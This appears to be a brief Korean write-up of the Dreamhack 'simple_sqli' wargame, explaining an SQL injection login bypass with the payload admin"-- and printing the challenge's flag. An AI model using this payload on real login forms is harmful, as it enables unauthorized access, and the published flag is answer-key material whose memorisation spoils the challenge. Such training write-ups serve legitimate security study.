[Dreamhack] simple_sqli 풀이

드림핵: simple_sqli
https://dreamhack.io/wargame/challenges/24

1. 문제

2. 풀이

공격 쿼리문을 다음과 같이 작성했다. userid 검색 조건만 처리하고 뒤의 내용은 주석처리하도록 하는 방식이다.

SELECT * FROM users WHERE userid="admin"-- " AND userpassword="dddd"

이때 userid에 admin"--을 입력하고 userpassword는 아무거나 입력해 주면 flag를 얻을 수 있다.

3. FLAG

DH{c1126c8d35d8deaa39c5dd6fc8855ed0}